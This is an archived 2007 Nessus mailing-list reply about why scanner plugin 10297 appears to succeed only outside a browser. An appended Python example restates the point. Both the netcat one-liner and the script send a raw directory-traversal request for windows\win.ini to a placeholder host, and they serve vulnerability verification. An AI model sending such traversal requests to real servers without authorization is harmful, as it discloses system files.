Nessus

Re: Plugin 10297

To: Nessus@list.nessus.org
Subject: Re: Plugin 10297
From: Michel Arboi <mikhail@nessus.org>
Date: Sun, 18 Feb 2007 10:48:32 +0100
Cc:
Delivered-to: sp-com-lists@consult.net
Delivered-to: nessus-list1@securepoint.com
Delivered-to: Nessus@list.nessus.org
In-reply-to: <45D5CD1B.5090202@tenablesecurity.com> (George A. Theall's message of "Fri, 16 Feb 2007 10:26:19 -0500")
List-archive: <http://mail.nessus.org/pipermail/nessus>
List-help: <mailto:nessus-request@list.nessus.org?subject=help>
List-id: Discussion of Nessus software <nessus.list.nessus.org>
List-post: <mailto:nessus@list.nessus.org>
List-subscribe: <http://mail.nessus.org/mailman/listinfo/nessus>, <mailto:nessus-request@list.nessus.org?subject=subscribe>
List-unsubscribe: <http://mail.nessus.org/mailman/listinfo/nessus>, <mailto:nessus-request@list.nessus.org?subject=unsubscribe>
References: <9B71985304C4914AACE30A5BD6A08771351BDA@sumac.cfs.le.ac.uk> <45D5CD1B.5090202@tenablesecurity.com>
Sender: nessus-bounces@list.nessus.org
User-agent: Gnus/5.1008 (Gnus v5.10.8) Emacs/21.4 (gnu/linux)
On Fri Feb 16 2007 at 16:26, George A. Theall wrote:

> It probably is a browser issue -- some exploits are sensitive to the
> format of the request, and browsers can encode the URLs before sending
> them.

IIRC, it is not really a matter of "encoding", but rather the browser
simplifying the request by stripping useless /../

> To be sure, you could test by telnet'ing into the web server and
> issuing the command by hand.

Telnet might fail in some cases. Netcat is better:

echo -e 'GET ..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\r\nHost: IP\r\n\r\n' | nc IP 80


-- 
http://www.bigfoot.com/~arboi           http://ma75.blogspot.com/
PGP key ID : 0x0BBABA91 - 0x1320924F0BBABA91
Fingerprint: 1048 B09B EEAF 20AA F645  2E1A 1320 924F 0BBA BA91
_______________________________________________
Nessus mailing list
Nessus@list.nessus.org
http://mail.nessus.org/mailman/listinfo/nessus
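The following is an added example, not code from the list post or from the Nessus project. It restates the netcat one-liner in Python so the two halves of Michel's point can be seen side by side: the raw request is sent byte-for-byte, so the unnormalized ..\..\ sequences reach the server, whereas a browser collapses them first and the server only ever sees /windows/win.ini. The target address (192.0.2.10) is a placeholder, the `Connection: close` header is added so the read terminates, and `browser_normalize` is a simplified model of RFC 3986 dot-segment removal, not any particular browser's code.

```python
"""Send a path-traversal request exactly as typed, and show what a browser
would have sent instead.

Added example, not from the list post or from Nessus.  Placeholders:
the target address and the traversal path are constructed for illustration.
"""
import socket


def build_raw_request(path, host, method="GET"):
    """Return the exact request bytes for `path`, with no normalization.

    `path` is copied byte-for-byte, so "..\\..\\windows\\win.ini" survives
    intact, unlike when it is typed into a browser address bar.
    """
    lines = [
        f"{method} {path} HTTP/1.1",
        f"Host: {host}",
        "Connection: close",  # assumption: lets the server end the response
        "",
        "",
    ]
    return "\r\n".join(lines).encode("latin-1")


def browser_normalize(path):
    """Model of the dot-segment removal a browser applies before sending.

    Both separators are treated as "/", "." segments are dropped and ".."
    pops the previous segment; ".." at the root is silently discarded.
    Simplified model of RFC 3986 remove_dot_segments, not real browser code.
    """
    segments = []
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def send_raw(host, port, request, timeout=5.0):
    """Deliver `request` verbatim and return the response head (status line
    and headers) as text; the body is not needed to see whether the
    traversal was accepted."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        data = b""
        while b"\r\n\r\n" not in data:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return data.split(b"\r\n\r\n", 1)[0].decode("latin-1", "replace")


if __name__ == "__main__":
    TARGET = "192.0.2.10"  # placeholder (TEST-NET-1); use the scanned host
    PATH = "..\\..\\..\\..\\..\\..\\windows\\win.ini"  # same path as the nc example
    req = build_raw_request(PATH, TARGET)
    print("Request line sent on the wire:", req.split(b"\r\n")[0].decode())
    print("Path a browser would send instead:", browser_normalize(PATH))
    print(send_raw(TARGET, 80, req))
```

Run the normalizer on the same path first: the six leading ..\ segments vanish and the request becomes a request for /windows/win.ini relative to the web root, which is why a check that "works" with netcat and "fails" in a browser is a client-side artifact rather than a sign that the server is patched.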
